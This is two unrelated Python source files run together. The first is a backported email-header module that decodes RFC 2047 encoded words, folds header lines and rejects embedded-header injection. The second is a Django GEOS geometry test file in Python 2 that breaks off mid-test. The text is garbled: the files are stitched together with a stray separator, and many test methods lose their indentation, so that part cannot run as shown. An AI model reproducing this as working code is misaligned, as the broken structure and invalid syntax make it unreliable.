from future.builtins import bytes, range, str, super, zip
__all__ = [
'Header',
'decode_header',
'make_header',
]
import re
import binascii
from future.backports import email
from future.backports.email import base64mime
from future.backports.email.errors import HeaderParseError
import future.backports.email.charset as _charset
# Helpers
from future.backports.email.quoprimime import _max_append, header_decode
Charset = _charset.Charset
NL = '\n'
SPACE = ' '
BSPACE = b' '
SPACE8 = ' ' * 8
EMPTYSTRING = ''
MAXLINELEN = 78
FWS = ' \t'
USASCII = Charset('us-ascii')
UTF8 = Charset('utf-8')
# Match encoded-word strings in the form =?charset?q?Hello_World?=
ecre = re.compile(r'''
=\? # literal =?
(?P<charset>[^?]*?) # non-greedy up to the next ? is the charset
\? # literal ?
(?P<encoding>[qb]) # either a "q" or a "b", case insensitive
\? # literal ?
(?P<encoded>.*?) # non-greedy up to the next ?= is the encoded string
\?= # literal ?=
''', re.VERBOSE | re.IGNORECASE | re.MULTILINE)
# Field name regexp, including trailing colon, but not separating whitespace,
# according to RFC 2822. Character range is from tilde to exclamation mark.
# For use with .match()
fcre = re.compile(r'[\041-\176]+:$')
# Find a header embedded in a putative header value. Used to check for
# header injection attack.
_embeded_header = re.compile(r'\n[^ \t]+:')
def decode_header(header):
    """Decode a message header value without converting charset.

    Returns a list of (string, charset) pairs containing each of the decoded
    parts of the header.  Charset is None for non-encoded parts of the header,
    otherwise a lower-case string containing the name of the character set
    specified in the encoded string.

    header may be a string that may or may not contain RFC2047 encoded words,
    or it may be a Header object.

    An email.errors.HeaderParseError may be raised when certain decoding error
    occurs (e.g. a base64 decoding exception).
    """
    # If it is a Header object, we can just return the encoded chunks.
    if hasattr(header, '_chunks'):
        return [(_charset._encode(string, str(charset)), str(charset))
                for string, charset in header._chunks]
    # If no encoding, just return the header with no charset.
    if not ecre.search(header):
        return [(header, None)]
    # First step is to parse all the encoded parts into triplets of the form
    # (encoded_string, encoding, charset).  For unencoded strings, the last
    # two parts will be None.
    words = []
    for line in header.splitlines():
        parts = ecre.split(line)
        first = True
        while parts:
            unencoded = parts.pop(0)
            if first:
                unencoded = unencoded.lstrip()
                first = False
            if unencoded:
                words.append((unencoded, None, None))
            if parts:
                # ecre has three groups, so a match contributes three parts.
                charset = parts.pop(0).lower()
                encoding = parts.pop(0).lower()
                encoded = parts.pop(0)
                words.append((encoded, encoding, charset))
    # Now loop over words and remove words that consist of whitespace
    # between two encoded strings.
    # (A stray function-local `import sys` has been removed here; it was
    # never used.)
    droplist = []
    for n, w in enumerate(words):
        if n > 1 and w[1] and words[n - 2][1] and words[n - 1][0].isspace():
            droplist.append(n - 1)
    for d in reversed(droplist):
        del words[d]
    # The next step is to decode each encoded word by applying the reverse
    # base64 or quopri transformation.  decoded_words is now a list of the
    # form (decoded_word, charset).
    decoded_words = []
    for encoded_string, encoding, charset in words:
        if encoding is None:
            # This is an unencoded word.
            decoded_words.append((encoded_string, charset))
        elif encoding == 'q':
            word = header_decode(encoded_string)
            decoded_words.append((word, charset))
        elif encoding == 'b':
            paderr = len(encoded_string) % 4  # Postel's law: add missing padding
            if paderr:
                encoded_string += '==='[:4 - paderr]
            try:
                word = base64mime.decode(encoded_string)
            except binascii.Error:
                raise HeaderParseError('Base64 decoding error')
            else:
                decoded_words.append((word, charset))
        else:
            raise AssertionError('Unexpected encoding: ' + encoding)
    # Now convert all words to bytes and collapse consecutive runs of
    # similarly encoded words.
    collapsed = []
    last_word = last_charset = None
    for word, charset in decoded_words:
        if isinstance(word, str):
            word = bytes(word, 'raw-unicode-escape')
        if last_word is None:
            last_word = word
            last_charset = charset
        elif charset != last_charset:
            collapsed.append((last_word, last_charset))
            last_word = word
            last_charset = charset
        elif last_charset is None:
            last_word += BSPACE + word
        else:
            last_word += word
    collapsed.append((last_word, last_charset))
    return collapsed
def make_header(decoded_seq, maxlinelen=None, header_name=None,
                continuation_ws=' '):
    """Create a Header from a sequence of pairs as returned by decode_header()

    decode_header() takes a header value string and returns a sequence of
    pairs of the format (decoded_string, charset) where charset is the string
    name of the character set.

    This function takes one of those sequence of pairs and returns a Header
    instance.  Optional maxlinelen, header_name, and continuation_ws are as in
    the Header constructor.
    """
    header = Header(maxlinelen=maxlinelen, header_name=header_name,
                    continuation_ws=continuation_ws)
    for string, charset in decoded_seq:
        # Normalize plain charset names to Charset instances; None is a
        # valid value (us-ascii) and is passed straight through to append().
        if charset is not None and not isinstance(charset, Charset):
            charset = Charset(charset)
        header.append(string, charset)
    return header
class Header(object):
    """A MIME-compliant header value that may span multiple character sets."""

    def __init__(self, s=None, charset=None,
                 maxlinelen=None, header_name=None,
                 continuation_ws=' ', errors='strict'):
        """Create a MIME-compliant header that can contain many character sets.

        Optional s is the initial header value.  If None, the initial header
        value is not set.  You can later append to the header with .append()
        method calls.  s may be a byte string or a Unicode string, but see the
        .append() documentation for semantics.

        Optional charset serves two purposes: it has the same meaning as the
        charset argument to the .append() method.  It also sets the default
        character set for all subsequent .append() calls that omit the charset
        argument.  If charset is not provided in the constructor, the us-ascii
        charset is used both as s's initial charset and as the default for
        subsequent .append() calls.

        The maximum line length can be specified explicitly via maxlinelen. For
        splitting the first line to a shorter value (to account for the field
        header which isn't included in s, e.g. `Subject') pass in the name of
        the field in header_name.  The default maxlinelen is 78 as recommended
        by RFC 2822.

        continuation_ws must be RFC 2822 compliant folding whitespace (usually
        either a space or a hard tab) which will be prepended to continuation
        lines.

        errors is passed through to the .append() call.
        """
        if charset is None:
            charset = USASCII
        elif not isinstance(charset, Charset):
            charset = Charset(charset)
        self._charset = charset
        self._continuation_ws = continuation_ws
        self._chunks = []
        if s is not None:
            self.append(s, charset, errors)
        if maxlinelen is None:
            maxlinelen = MAXLINELEN
        self._maxlinelen = maxlinelen
        if header_name is None:
            self._headerlen = 0
        else:
            # Take the separating colon and space into account.
            self._headerlen = len(header_name) + 2

    def __str__(self):
        """Return the string value of the header."""
        self._normalize()
        uchunks = []
        lastcs = None
        lastspace = None
        for string, charset in self._chunks:
            # We must preserve spaces between encoded and non-encoded word
            # boundaries, which means for us we need to add a space when we go
            # from a charset to None/us-ascii, or from None/us-ascii to a
            # charset.  Only do this for the second and subsequent chunks.
            # Don't add a space if the None/us-ascii string already has
            # a space (trailing or leading depending on transition)
            nextcs = charset
            if nextcs == _charset.UNKNOWN8BIT:
                original_bytes = string.encode('ascii', 'surrogateescape')
                string = original_bytes.decode('ascii', 'replace')
            if uchunks:
                hasspace = string and self._nonctext(string[0])
                if lastcs not in (None, 'us-ascii'):
                    if nextcs in (None, 'us-ascii') and not hasspace:
                        uchunks.append(SPACE)
                        nextcs = None
                elif nextcs not in (None, 'us-ascii') and not lastspace:
                    uchunks.append(SPACE)
            lastspace = string and self._nonctext(string[-1])
            lastcs = nextcs
            uchunks.append(string)
        return EMPTYSTRING.join(uchunks)

    # Rich comparison operators for equality only.  BAW: does it make sense to
    # have or explicitly disable <, <=, >, >= operators?
    def __eq__(self, other):
        # other may be a Header or a string.  Both are fine so coerce
        # ourselves to a unicode (of the unencoded header value), swap the
        # args and do another comparison.
        return other == str(self)

    def __ne__(self, other):
        return not self == other

    def append(self, s, charset=None, errors='strict'):
        """Append a string to the MIME header.

        Optional charset, if given, should be a Charset instance or the name
        of a character set (which will be converted to a Charset instance).  A
        value of None (the default) means that the charset given in the
        constructor is used.

        s may be a byte string or a Unicode string.  If it is a byte string
        (i.e. isinstance(s, str) is false), then charset is the encoding of
        that byte string, and a UnicodeError will be raised if the string
        cannot be decoded with that charset.  If s is a Unicode string, then
        charset is a hint specifying the character set of the characters in
        the string.  In either case, when producing an RFC 2822 compliant
        header using RFC 2047 rules, the string will be encoded using the
        output codec of the charset.  If the string cannot be encoded to the
        output codec, a UnicodeError will be raised.

        Optional `errors' is passed as the errors argument to the decode
        call if s is a byte string.
        """
        if charset is None:
            charset = self._charset
        elif not isinstance(charset, Charset):
            charset = Charset(charset)
        if not isinstance(s, str):
            input_charset = charset.input_codec or 'us-ascii'
            if input_charset == _charset.UNKNOWN8BIT:
                s = s.decode('us-ascii', 'surrogateescape')
            else:
                s = s.decode(input_charset, errors)
        # Ensure that the bytes we're storing can be decoded to the output
        # character set, otherwise an early error is raised.
        output_charset = charset.output_codec or 'us-ascii'
        if output_charset != _charset.UNKNOWN8BIT:
            try:
                s.encode(output_charset, errors)
            except UnicodeEncodeError:
                if output_charset != 'us-ascii':
                    raise
                # Fall back to UTF-8 when the value won't fit in us-ascii.
                charset = UTF8
        self._chunks.append((s, charset))

    def _nonctext(self, s):
        """True if string s is not a ctext character of RFC822.
        """
        return s.isspace() or s in ('(', ')', '\\')

    def encode(self, splitchars=';, \t', maxlinelen=None, linesep='\n'):
        r"""Encode a message header into an RFC-compliant format.

        There are many issues involved in converting a given string for use in
        an email header.  Only certain character sets are readable in most
        email clients, and as header strings can only contain a subset of
        7-bit ASCII, care must be taken to properly convert and encode (with
        Base64 or quoted-printable) header strings.  In addition, there is a
        75-character length limit on any given encoded header field, so
        line-wrapping must be performed, even with double-byte character sets.

        Optional maxlinelen specifies the maximum length of each generated
        line, exclusive of the linesep string.  Individual lines may be longer
        than maxlinelen if a folding point cannot be found.  The first line
        will be shorter by the length of the header name plus ": " if a header
        name was specified at Header construction time.  The default value for
        maxlinelen is determined at header construction time.

        Optional splitchars is a string containing characters which should be
        given extra weight by the splitting algorithm during normal header
        wrapping.  This is in very rough support of RFC 2822's `higher level
        syntactic breaks':  split points preceded by a splitchar are preferred
        during line splitting, with the characters preferred in the order in
        which they appear in the string.  Space and tab may be included in the
        string to indicate whether preference should be given to one over the
        other as a split point when other split chars do not appear in the line
        being split.  Splitchars does not affect RFC 2047 encoded lines.

        Optional linesep is a string to be used to separate the lines of
        the value.  The default value is the most useful for typical
        Python applications, but it can be set to \r\n to produce RFC-compliant
        line separators when needed.
        """
        self._normalize()
        if maxlinelen is None:
            maxlinelen = self._maxlinelen
        # A maxlinelen of 0 means don't wrap.  For all practical purposes,
        # choosing a huge number here accomplishes that and makes the
        # _ValueFormatter algorithm much simpler.
        if maxlinelen == 0:
            maxlinelen = 1000000
        formatter = _ValueFormatter(self._headerlen, maxlinelen,
                                    self._continuation_ws, splitchars)
        lastcs = None
        hasspace = lastspace = None
        for string, charset in self._chunks:
            if hasspace is not None:
                hasspace = string and self._nonctext(string[0])
                # (A stray per-iteration `import sys` has been removed here;
                # it was never used.)
                if lastcs not in (None, 'us-ascii'):
                    if not hasspace or charset not in (None, 'us-ascii'):
                        formatter.add_transition()
                elif charset not in (None, 'us-ascii') and not lastspace:
                    formatter.add_transition()
            lastspace = string and self._nonctext(string[-1])
            lastcs = charset
            hasspace = False
            lines = string.splitlines()
            if lines:
                formatter.feed('', lines[0], charset)
            else:
                formatter.feed('', '', charset)
            for line in lines[1:]:
                formatter.newline()
                if charset.header_encoding is not None:
                    formatter.feed(self._continuation_ws, ' ' + line.lstrip(),
                                   charset)
                else:
                    sline = line.lstrip()
                    fws = line[:len(line) - len(sline)]
                    formatter.feed(fws, sline, charset)
            if len(lines) > 1:
                formatter.newline()
        if self._chunks:
            formatter.add_transition()
        value = formatter._str(linesep)
        if _embeded_header.search(value):
            raise HeaderParseError("header value appears to contain "
                                   "an embedded header: {!r}".format(value))
        return value

    def _normalize(self):
        # Step 1: Normalize the chunks so that all runs of identical charsets
        # get collapsed into a single unicode string.
        chunks = []
        last_charset = None
        last_chunk = []
        for string, charset in self._chunks:
            if charset == last_charset:
                last_chunk.append(string)
            else:
                if last_charset is not None:
                    chunks.append((SPACE.join(last_chunk), last_charset))
                last_chunk = [string]
                last_charset = charset
        if last_chunk:
            chunks.append((SPACE.join(last_chunk), last_charset))
        self._chunks = chunks
class _ValueFormatter(object):
    """Folds a header value into RFC 2822 lines of at most `maxlen` chars.

    Accumulates (fws, string) parts into a current line and flushes
    completed lines into self._lines.  The splitting strategy depends on
    whether the chunk's charset uses an RFC 2047 header encoding.
    """
    def __init__(self, headerlen, maxlen, continuation_ws, splitchars):
        # headerlen: length of "HeaderName: " already consumed on line one.
        self._maxlen = maxlen
        self._continuation_ws = continuation_ws
        self._continuation_ws_len = len(continuation_ws)
        self._splitchars = splitchars
        self._lines = []
        self._current_line = _Accumulator(headerlen)
    def _str(self, linesep):
        """Flush the pending line and join all lines with `linesep`."""
        self.newline()
        return linesep.join(self._lines)
    def __str__(self):
        return self._str(NL)
    def newline(self):
        """Finish the current line and start a fresh accumulator."""
        end_of_line = self._current_line.pop()
        # Drop a trailing bare transition marker (' ', ''); keep anything else.
        if end_of_line != (' ', ''):
            self._current_line.push(*end_of_line)
        if len(self._current_line) > 0:
            # Whitespace-only content is folded onto the previous line rather
            # than emitted as a line of its own.
            if self._current_line.is_onlyws():
                self._lines[-1] += str(self._current_line)
            else:
                self._lines.append(str(self._current_line))
        self._current_line.reset()
    def add_transition(self):
        # Marker space between differently-encoded chunks; may be dropped
        # again at end of line by newline().
        self._current_line.push(' ', '')
    def feed(self, fws, string, charset):
        """Add one chunk (leading folding whitespace + text) to the value."""
        # If the charset has no header encoding (i.e. it is an ASCII encoding)
        # then we must split the header at the "highest level syntactic break"
        # possible. Note that we don't have a lot of smarts about field
        # syntax; we just try to break on semi-colons, then commas, then
        # whitespace.  Eventually, this should be pluggable.
        if charset.header_encoding is None:
            self._ascii_split(fws, string, self._splitchars)
            return
        # Otherwise, we're doing either a Base64 or a quoted-printable
        # encoding which means we don't need to split the line on syntactic
        # breaks.  We can basically just find enough characters to fit on the
        # current line, minus the RFC 2047 chrome.  What makes this trickier
        # though is that we have to split at octet boundaries, not character
        # boundaries but it's only safe to split at character boundaries so at
        # best we can only get close.
        encoded_lines = charset.header_encode_lines(string, self._maxlengths())
        # The first element extends the current line, but if it's None then
        # nothing more fit on the current line so start a new line.
        try:
            first_line = encoded_lines.pop(0)
        except IndexError:
            # There are no encoded lines, so we're done.
            return
        if first_line is not None:
            self._append_chunk(fws, first_line)
        try:
            last_line = encoded_lines.pop()
        except IndexError:
            # There was only one line.
            return
        self.newline()
        self._current_line.push(self._continuation_ws, last_line)
        # Everything else are full lines in themselves.
        for line in encoded_lines:
            self._lines.append(self._continuation_ws + line)
    def _maxlengths(self):
        """Yield the room available on each successive output line."""
        # The first line's length.
        yield self._maxlen - len(self._current_line)
        while True:
            yield self._maxlen - self._continuation_ws_len
    def _ascii_split(self, fws, string, splitchars):
        # The RFC 2822 header folding algorithm is simple in principle but
        # complex in practice.  Lines may be folded any place where "folding
        # white space" appears by inserting a linesep character in front of the
        # FWS.  The complication is that not all spaces or tabs qualify as FWS,
        # and we are also supposed to prefer to break at "higher level
        # syntactic breaks".  We can't do either of these without intimate
        # knowledge of the structure of structured headers, which we don't have
        # here.  So the best we can do here is prefer to break at the specified
        # splitchars, and hope that we don't choose any spaces or tabs that
        # aren't legal FWS.  (This is at least better than the old algorithm,
        # where we would sometimes *introduce* FWS after a splitchar, or the
        # algorithm before that, where we would turn all white space runs into
        # single spaces or tabs.)
        parts = re.split("([" + FWS + "]+)", fws + string)
        if parts[0]:
            # String started with non-FWS text: give it an empty fws slot so
            # the pairwise iteration below stays aligned.
            parts[:0] = ['']
        else:
            parts.pop(0)
        # Iterate (fws, text) pairs.
        for fws, part in zip(*[iter(parts)] * 2):
            self._append_chunk(fws, part)
    def _append_chunk(self, fws, string):
        self._current_line.push(fws, string)
        if len(self._current_line) > self._maxlen:
            # Find the best split point, working backward from the end.
            # There might be none, on a long first line.
            for ch in self._splitchars:
                for i in range(self._current_line.part_count() - 1, 0, -1):
                    if ch.isspace():
                        fws = self._current_line[i][0]
                        if fws and fws[0] == ch:
                            break
                    prevpart = self._current_line[i - 1][1]
                    if prevpart and prevpart[-1] == ch:
                        break
                else:
                    continue
                break
            else:
                # No split point found for any splitchar.
                fws, part = self._current_line.pop()
                if self._current_line._initial_size > 0:
                    # There will be a header, so leave it on a line by itself.
                    self.newline()
                    if not fws:
                        # We don't use continuation_ws here because the whitespace
                        # after a header should always be a space.
                        fws = ' '
                self._current_line.push(fws, part)
                return
            # Split: everything from index i starts the next line.
            remainder = self._current_line.pop_from(i)
            self._lines.append(str(self._current_line))
            self._current_line.reset(remainder)
class _Accumulator(list):
    """A list of (fws, string) parts making up one header line under
    construction.  Tracks an `initial_size` offset for the header-name
    prefix already present on the first physical line.
    """
    def __init__(self, initial_size=0):
        self._initial_size = initial_size
        super().__init__()
    def push(self, fws, string):
        self.append((fws, string))
    def pop_from(self, i=0):
        """Remove and return all parts from index i to the end."""
        tail = self[i:]
        self[i:] = []
        return tail
    def pop(self):
        """Pop the last part, or ('', '') when empty."""
        return super().pop() if self.part_count() else ('', '')
    def __len__(self):
        # Logical length in characters, including the header-name prefix.
        total = self._initial_size
        for fws, part in self:
            total += len(fws) + len(part)
        return total
    def __str__(self):
        pieces = [fws + part for fws, part in self]
        return EMPTYSTRING.join(pieces)
    def reset(self, startval=None):
        self[:] = [] if startval is None else startval
        self._initial_size = 0
    def is_onlyws(self):
        """True when there is no header prefix and the content is blank."""
        if self._initial_size != 0:
            return False
        return not self or str(self).isspace()
    def part_count(self):
        # Number of (fws, string) parts, as opposed to character length.
        return super().__len__()
| |
import ctypes, random, unittest, sys
from django.contrib.gis.geos import *
from django.contrib.gis.geos.base import gdal, numpy, GEOSBase
from django.contrib.gis.tests.geometries import *
class GEOSTest(unittest.TestCase):
@property
def null_srid(self):
"""
Returns the proper null SRID depending on the GEOS version.
See the comments in `test15_srid` for more details.
"""
info = geos_version_info()
if info['version'] == '3.0.0' and info['release_candidate']:
return -1
else:
return None
    def test00_base(self):
        "Tests out the GEOSBase class."
        # Testing out GEOSBase class, which provides a `ptr` property
        # that abstracts out access to underlying C pointers.
        class FakeGeom1(GEOSBase):
            pass
        # This one only accepts pointers to floats
        c_float_p = ctypes.POINTER(ctypes.c_float)
        class FakeGeom2(GEOSBase):
            ptr_type = c_float_p
        # Default ptr_type is `c_void_p`.
        fg1 = FakeGeom1()
        # Default ptr_type is C float pointer
        fg2 = FakeGeom2()
        # These assignments are OK -- None is allowed because
        # it's equivalent to the NULL pointer.
        fg1.ptr = ctypes.c_void_p()
        fg1.ptr = None
        fg2.ptr = c_float_p(ctypes.c_float(5.23))
        fg2.ptr = None
        # Because pointers have been set to NULL, an exception should be
        # raised when we try to access it.  Raising an exception is
        # preferable to a segmentation fault that commonly occurs when
        # a C method is given a NULL memory reference.
        for fg in (fg1, fg2):
            # Equivalent to `fg.ptr`
            self.assertRaises(GEOSException, fg._get_ptr)
        # Anything that is either not None or the acceptable pointer type will
        # result in a TypeError when trying to assign it to the `ptr` property.
        # Thus, memory addresses (integers) and pointers of the incorrect type
        # (in `bad_ptrs`) will not be allowed.
        bad_ptrs = (5, ctypes.c_char_p('foobar'))
        for bad_ptr in bad_ptrs:
            # Equivalent to `fg.ptr = bad_ptr`
            self.assertRaises(TypeError, fg1._set_ptr, bad_ptr)
            self.assertRaises(TypeError, fg2._set_ptr, bad_ptr)
def test01a_wkt(self):
"Testing WKT output."
for g in wkt_out:
geom = fromstr(g.wkt)
self.assertEqual(g.ewkt, geom.wkt)
def test01b_hex(self):
"Testing HEX output."
for g in hex_wkt:
geom = fromstr(g.wkt)
self.assertEqual(g.hex, geom.hex)
    def test01b_hexewkb(self):
        "Testing (HEX)EWKB output."
        from binascii import a2b_hex
        # Reference points with and without a Z dimension.
        pnt_2d = Point(0, 1, srid=4326)
        pnt_3d = Point(0, 1, 2, srid=4326)
        # OGC-compliant HEX will not have SRID nor Z value.
        self.assertEqual(ogc_hex, pnt_2d.hex)
        self.assertEqual(ogc_hex, pnt_3d.hex)
        # HEXEWKB should be appropriate for its dimension -- have to use an
        # a WKBWriter w/dimension set accordingly, else GEOS will insert
        # garbage into 3D coordinate if there is none.  Also, GEOS has a
        # a bug in versions prior to 3.1 that puts the X coordinate in
        # place of Z; an exception should be raised on those versions.
        self.assertEqual(hexewkb_2d, pnt_2d.hexewkb)
        if GEOS_PREPARE:
            self.assertEqual(hexewkb_3d, pnt_3d.hexewkb)
            self.assertEqual(True, GEOSGeometry(hexewkb_3d).hasz)
        else:
            # Pre-3.1 GEOS: asking for 3D HEXEWKB must raise.
            try:
                hexewkb = pnt_3d.hexewkb
            except GEOSException:
                pass
            else:
                self.fail('Should have raised GEOSException.')
        # Same for EWKB.
        self.assertEqual(buffer(a2b_hex(hexewkb_2d)), pnt_2d.ewkb)
        if GEOS_PREPARE:
            self.assertEqual(buffer(a2b_hex(hexewkb_3d)), pnt_3d.ewkb)
        else:
            try:
                ewkb = pnt_3d.ewkb
            except GEOSException:
                pass
            else:
                self.fail('Should have raised GEOSException')
        # Redundant sanity check.
        self.assertEqual(4326, GEOSGeometry(hexewkb_2d).srid)
def test01c_kml(self):
"Testing KML output."
for tg in wkt_out:
geom = fromstr(tg.wkt)
kml = getattr(tg, 'kml', False)
if kml: self.assertEqual(kml, geom.kml)
    def test01d_errors(self):
        "Testing the Error handlers."
        # NOTE: GEOS writes error notices directly to stderr; the BEGIN/END
        # banners mark that output as expected.
        # string-based
        print "\nBEGIN - expecting GEOS_ERROR; safe to ignore.\n"
        for err in errors:
            try:
                g = fromstr(err.wkt)
            except (GEOSException, ValueError):
                pass
        # Bad WKB
        self.assertRaises(GEOSException, GEOSGeometry, buffer('0'))
        print "\nEND - expecting GEOS_ERROR; safe to ignore.\n"
        class NotAGeometry(object):
            pass
        # Some other object
        self.assertRaises(TypeError, GEOSGeometry, NotAGeometry())
        # None
        self.assertRaises(TypeError, GEOSGeometry, None)
def test01e_wkb(self):
"Testing WKB output."
from binascii import b2a_hex
for g in hex_wkt:
geom = fromstr(g.wkt)
wkb = geom.wkb
self.assertEqual(b2a_hex(wkb).upper(), g.hex)
def test01f_create_hex(self):
"Testing creation from HEX."
for g in hex_wkt:
geom_h = GEOSGeometry(g.hex)
# we need to do this so decimal places get normalised
geom_t = fromstr(g.wkt)
self.assertEqual(geom_t.wkt, geom_h.wkt)
def test01g_create_wkb(self):
"Testing creation from WKB."
from binascii import a2b_hex
for g in hex_wkt:
wkb = buffer(a2b_hex(g.hex))
geom_h = GEOSGeometry(wkb)
# we need to do this so decimal places get normalised
geom_t = fromstr(g.wkt)
self.assertEqual(geom_t.wkt, geom_h.wkt)
def test01h_ewkt(self):
"Testing EWKT."
srid = 32140
for p in polygons:
ewkt = 'SRID=%d;%s' % (srid, p.wkt)
poly = fromstr(ewkt)
self.assertEqual(srid, poly.srid)
self.assertEqual(srid, poly.shell.srid)
self.assertEqual(srid, fromstr(poly.ewkt).srid) # Checking export
def test01i_json(self):
"Testing GeoJSON input/output (via GDAL)."
if not gdal or not gdal.GEOJSON: return
for g in json_geoms:
geom = GEOSGeometry(g.wkt)
if not hasattr(g, 'not_equal'):
self.assertEqual(g.json, geom.json)
self.assertEqual(g.json, geom.geojson)
self.assertEqual(GEOSGeometry(g.wkt), GEOSGeometry(geom.json))
def test01k_fromfile(self):
"Testing the fromfile() factory."
from StringIO import StringIO
ref_pnt = GEOSGeometry('POINT(5 23)')
wkt_f = StringIO()
wkt_f.write(ref_pnt.wkt)
wkb_f = StringIO()
wkb_f.write(str(ref_pnt.wkb))
# Other tests use `fromfile()` on string filenames so those
# aren't tested here.
for fh in (wkt_f, wkb_f):
fh.seek(0)
pnt = fromfile(fh)
self.assertEqual(ref_pnt, pnt)
def test01k_eq(self):
"Testing equivalence."
p = fromstr('POINT(5 23)')
self.assertEqual(p, p.wkt)
self.assertNotEqual(p, 'foo')
ls = fromstr('LINESTRING(0 0, 1 1, 5 5)')
self.assertEqual(ls, ls.wkt)
self.assertNotEqual(p, 'bar')
# Error shouldn't be raise on equivalence testing with
# an invalid type.
for g in (p, ls):
self.assertNotEqual(g, None)
self.assertNotEqual(g, {'foo' : 'bar'})
self.assertNotEqual(g, False)
def test02a_points(self):
"Testing Point objects."
prev = fromstr('POINT(0 0)')
for p in points:
# Creating the point from the WKT
pnt = fromstr(p.wkt)
self.assertEqual(pnt.geom_type, 'Point')
self.assertEqual(pnt.geom_typeid, 0)
self.assertEqual(p.x, pnt.x)
self.assertEqual(p.y, pnt.y)
self.assertEqual(True, pnt == fromstr(p.wkt))
self.assertEqual(False, pnt == prev)
# Making sure that the point's X, Y components are what we expect
self.assertAlmostEqual(p.x, pnt.tuple[0], 9)
self.assertAlmostEqual(p.y, pnt.tuple[1], 9)
# Testing the third dimension, and getting the tuple arguments
if hasattr(p, 'z'):
self.assertEqual(True, pnt.hasz)
self.assertEqual(p.z, pnt.z)
self.assertEqual(p.z, pnt.tuple[2], 9)
tup_args = (p.x, p.y, p.z)
set_tup1 = (2.71, 3.14, 5.23)
set_tup2 = (5.23, 2.71, 3.14)
else:
self.assertEqual(False, pnt.hasz)
self.assertEqual(None, pnt.z)
tup_args = (p.x, p.y)
set_tup1 = (2.71, 3.14)
set_tup2 = (3.14, 2.71)
# Centroid operation on point should be point itself
self.assertEqual(p.centroid, pnt.centroid.tuple)
# Now testing the different constructors
pnt2 = Point(tup_args) # e.g., Point((1, 2))
pnt3 = Point(*tup_args) # e.g., Point(1, 2)
self.assertEqual(True, pnt == pnt2)
self.assertEqual(True, pnt == pnt3)
# Now testing setting the x and y
pnt.y = 3.14
pnt.x = 2.71
self.assertEqual(3.14, pnt.y)
self.assertEqual(2.71, pnt.x)
# Setting via the tuple/coords property
pnt.tuple = set_tup1
self.assertEqual(set_tup1, pnt.tuple)
pnt.coords = set_tup2
self.assertEqual(set_tup2, pnt.coords)
prev = pnt # setting the previous geometry
    def test02b_multipoints(self):
        "Testing MultiPoint objects."
        for mp in multipoints:
            mpnt = fromstr(mp.wkt)
            self.assertEqual(mpnt.geom_type, 'MultiPoint')
            self.assertEqual(mpnt.geom_typeid, 4)
            # Centroid components compared with 9 decimal places of precision.
            self.assertAlmostEqual(mp.centroid[0], mpnt.centroid.tuple[0], 9)
            self.assertAlmostEqual(mp.centroid[1], mpnt.centroid.tuple[1], 9)
            # Indexing past the end must raise, not segfault.
            self.assertRaises(GEOSIndexError, mpnt.__getitem__, len(mpnt))
            self.assertEqual(mp.centroid, mpnt.centroid.tuple)
            self.assertEqual(mp.points, tuple(m.tuple for m in mpnt))
            # Each member geometry must be a valid, non-empty Point.
            for p in mpnt:
                self.assertEqual(p.geom_type, 'Point')
                self.assertEqual(p.geom_typeid, 0)
                self.assertEqual(p.empty, False)
                self.assertEqual(p.valid, True)
    def test03a_linestring(self):
        "Testing LineString objects."
        prev = fromstr('POINT(0 0)')
        for l in linestrings:
            ls = fromstr(l.wkt)
            self.assertEqual(ls.geom_type, 'LineString')
            self.assertEqual(ls.geom_typeid, 1)
            self.assertEqual(ls.empty, False)
            self.assertEqual(ls.ring, False)
            # `centroid` and `tup` are optional attributes on the fixtures.
            if hasattr(l, 'centroid'):
                self.assertEqual(l.centroid, ls.centroid.tuple)
            if hasattr(l, 'tup'):
                self.assertEqual(l.tup, ls.tuple)
            self.assertEqual(True, ls == fromstr(l.wkt))
            self.assertEqual(False, ls == prev)
            # Indexing past the end must raise, not segfault.
            self.assertRaises(GEOSIndexError, ls.__getitem__, len(ls))
            prev = ls
            # Creating a LineString from a tuple, list, and numpy array
            self.assertEqual(ls, LineString(ls.tuple))  # tuple
            self.assertEqual(ls, LineString(*ls.tuple)) # as individual arguments
            self.assertEqual(ls, LineString([list(tup) for tup in ls.tuple])) # as list
            self.assertEqual(ls.wkt, LineString(*tuple(Point(tup) for tup in ls.tuple)).wkt) # Point individual arguments
            if numpy: self.assertEqual(ls, LineString(numpy.array(ls.tuple))) # as numpy array
    def test03b_multilinestring(self):
        "Testing MultiLineString objects."
        prev = fromstr('POINT(0 0)')
        for l in multilinestrings:
            ml = fromstr(l.wkt)
            self.assertEqual(ml.geom_type, 'MultiLineString')
            self.assertEqual(ml.geom_typeid, 5)
            # Centroid components compared with 9 decimal places of precision.
            self.assertAlmostEqual(l.centroid[0], ml.centroid.x, 9)
            self.assertAlmostEqual(l.centroid[1], ml.centroid.y, 9)
            self.assertEqual(True, ml == fromstr(l.wkt))
            self.assertEqual(False, ml == prev)
            prev = ml
            # Each member geometry must be a non-empty LineString.
            for ls in ml:
                self.assertEqual(ls.geom_type, 'LineString')
                self.assertEqual(ls.geom_typeid, 1)
                self.assertEqual(ls.empty, False)
            # Indexing past the end must raise, not segfault.
            self.assertRaises(GEOSIndexError, ml.__getitem__, len(ml))
            # Reconstructing from clones and from coordinate tuples.
            self.assertEqual(ml.wkt, MultiLineString(*tuple(s.clone() for s in ml)).wkt)
            self.assertEqual(ml, MultiLineString(*tuple(LineString(s.tuple) for s in ml)))
def test04_linearring(self):
"Testing LinearRing objects."
for rr in linearrings:
lr = fromstr(rr.wkt)
self.assertEqual(lr.geom_type, 'LinearRing')
self.assertEqual(lr.geom_typeid, 2)
self.assertEqual(rr.n_p, len(lr))
self.assertEqual(True, lr.valid)
self.assertEqual(False, lr.empty)
# Creating a LinearRing from a tuple, list, and numpy array
self.assertEqual(lr, LinearRing(lr.tuple))
self.assertEqual(lr, LinearRing(*lr.tuple))
self.assertEqual(lr, LinearRing([list(tup) for tup in lr.tuple]))
if numpy: self.assertEqual(lr, LinearRing(numpy.array(lr.tuple)))
    def test05a_polygons(self):
        "Testing Polygon objects."
        # Testing `from_bbox` class method
        bbox = (-180, -90, 180, 90)
        p = Polygon.from_bbox( bbox )
        self.assertEqual(bbox, p.extent)
        prev = fromstr('POINT(0 0)')
        for p in polygons:
            # Creating the Polygon, testing its properties.
            poly = fromstr(p.wkt)
            self.assertEqual(poly.geom_type, 'Polygon')
            self.assertEqual(poly.geom_typeid, 3)
            self.assertEqual(poly.empty, False)
            self.assertEqual(poly.ring, False)
            self.assertEqual(p.n_i, poly.num_interior_rings)
            self.assertEqual(p.n_i + 1, len(poly)) # Testing __len__
            self.assertEqual(p.n_p, poly.num_points)
